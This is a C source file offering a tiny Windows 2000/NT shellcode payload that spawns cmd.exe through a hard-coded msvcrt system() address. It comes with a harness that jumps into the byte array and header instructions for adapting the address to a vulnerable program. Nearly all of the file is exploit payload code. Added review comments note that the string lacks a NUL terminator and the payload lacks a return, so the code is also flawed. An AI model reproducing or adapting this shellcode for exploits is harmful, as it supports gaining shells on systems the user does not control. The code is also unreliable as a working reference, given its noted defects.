// very small win2000/NT local shellcode (smallest I've seen)
//
// tested on win2000 server sp0 with VC++ 6.0
//
// you may need to change the address of system
// to get it you need two tools from vc++ or masm32 
// these tools are called listdlls.exe and dumpbin.exe
// in dos shell type:
//	 listdlls vunl.exe 				(search base address of msvcrt.dll)
//	dumpbin /exports c:\winnt\system32\msvcrt.dll 	(search offset of system)
//	add these offsets together and change it in the code
//
//	written by newroot
// 


#include <windows.h>
#include <winbase.h>


/*
 * 26-byte x86 payload that calls system("cmd.exe "); written by newroot.
 *
 * The bytes are raw machine code kept in an ordinary (writable, data-segment)
 * array; main() below jumps into it through a function pointer, so this only
 * runs on a system where data pages are executable (the win2000 target named
 * in the header; on a DEP/NX-enforcing system the jump would be expected to
 * fault). The call target is a hard-coded absolute address of msvcrt!system,
 * valid only for one specific msvcrt.dll build and load address — see the
 * header notes on recomputing it.
 *
 * NOTE(review): the 8 string bytes pushed below ("cmd." then "exe ") are not
 * followed by an explicit NUL; what system() sees past "cmd.exe " depends on
 * the saved ebp value sitting at [ebp] at run time. There is also no ret at
 * the end of the array, so after `call eax` returns, execution continues into
 * whatever bytes follow hellcode in the data section.
 */ 
unsigned char hellcode[]=
	"\x8b\xec"				//	mov	ebp, esp
	"\x55"					//	push	ebp
	"\x8b\xec"				//	mov	ebp, esp
	"\x68\x65\x78\x65\x20"			//	push    0x20657865  ("exe " as little-endian dword)
	"\x68\x63\x6d\x64\x2e"			//	push    0x2e646d63  ("cmd." as little-endian dword)
	"\x8d\x45\xf8"				//	lea     eax,[ebp-0x8] -> start of "cmd.exe " on the stack
	"\x50"					//  	push    eax           (the single argument to system())
	"\xb8"					//	mov	eax, imm32
	"\xad\xaa\x01\x78"			//	0x7801aaad <- address of system(); build-specific, see header
	"\xff\xd0"				//  	call    eax
	;


/*
 * Test harness: maps msvcrt.dll into this process and transfers control to
 * the hellcode byte array.
 *
 * argc/argv are unused. The LoadLibrary handle is discarded and its result is
 * not checked; presumably the call exists only so that the hard-coded
 * msvcrt!system address used inside hellcode is mapped — verify against the
 * header notes. Casting an object pointer to a function pointer is not
 * defined by ISO C; it is accepted by the MSVC toolchain named in the header.
 *
 * Returns 0 only if control comes back from hellcode. NOTE(review): the
 * payload ends with `call eax` and no ret, so `return 0` is not reliably
 * reached.
 */
int main (int argc, char **argv)
{
	void (*func)();        /* hellcode viewed as a no-argument function */

	LoadLibrary("msvcrt.dll");     /* return value (HMODULE) intentionally ignored */
	func =  (void *) hellcode;     /* data -> code pointer; requires an executable data page */
	func();                        /* does not return cleanly, see note above */
	
	return 0;
}

